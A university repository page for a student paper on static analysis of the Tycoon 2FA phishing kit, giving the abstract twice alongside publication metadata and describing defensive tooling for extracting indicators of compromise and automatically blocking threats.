Abstract
It's gotten much easier to be a cybercriminal. We're seeing a boom in "Phishing-as-a-Service" (PaaS) platforms, which sell advanced phishing attacks as a ready-to-use product. This means almost anyone can now get the tools to launch sophisticated attacks, even if they don't have a lot of technical skill.
This research dives into one of the most prominent threats, the Tycoon 2FA phishing kit. This kit is dangerous because it's designed to bypass Multi-Factor Authentication (MFA) using what is known as an Adversary-in-the-Middle (AiTM) attack.
This paper covers how I built and tested a set of Python-based tools to perform "static analysis" on phishing kits like this one. The process involved creating a custom analysis script, hitting and solving several environment and setup problems [9], and testing the tool on a safe, normal file to get a baseline [9]. The research wrapped up with a successful proof-of concept simulation. This test showed a complete, end-to-end workflow: from creating a fake threat and automatically gathering intelligence on it, to using that intel to automatically block the threat in a simulated Zero Trust security system.
These findings provide a validated method for pulling out actionable threat data (Indicators of Compromise, or IOCs) and set the stage for future work in building strong, automated defenses against AiTM phishing campaigns.
Faculty Advisor/Mentor
Shobha Vatsa
Document Type
Paper
Disciplines
Cybersecurity
DOI
10.25776/a716-c387
Publication Date
11-14-2025
Upload File
wf_yes
Included in
Deconstructing Tycoon 2FA: A Static Analysis Approach to Threat Intelligence and Automated Defense
It's gotten much easier to be a cybercriminal. We're seeing a boom in "Phishing-as-a-Service" (PaaS) platforms, which sell advanced phishing attacks as a ready-to-use product. This means almost anyone can now get the tools to launch sophisticated attacks, even if they don't have a lot of technical skill.
This research dives into one of the most prominent threats, the Tycoon 2FA phishing kit. This kit is dangerous because it's designed to bypass Multi-Factor Authentication (MFA) using what is known as an Adversary-in-the-Middle (AiTM) attack.
This paper covers how I built and tested a set of Python-based tools to perform "static analysis" on phishing kits like this one. The process involved creating a custom analysis script, hitting and solving several environment and setup problems [9], and testing the tool on a safe, normal file to get a baseline [9]. The research wrapped up with a successful proof-of concept simulation. This test showed a complete, end-to-end workflow: from creating a fake threat and automatically gathering intelligence on it, to using that intel to automatically block the threat in a simulated Zero Trust security system.
These findings provide a validated method for pulling out actionable threat data (Indicators of Compromise, or IOCs) and set the stage for future work in building strong, automated defenses against AiTM phishing campaigns.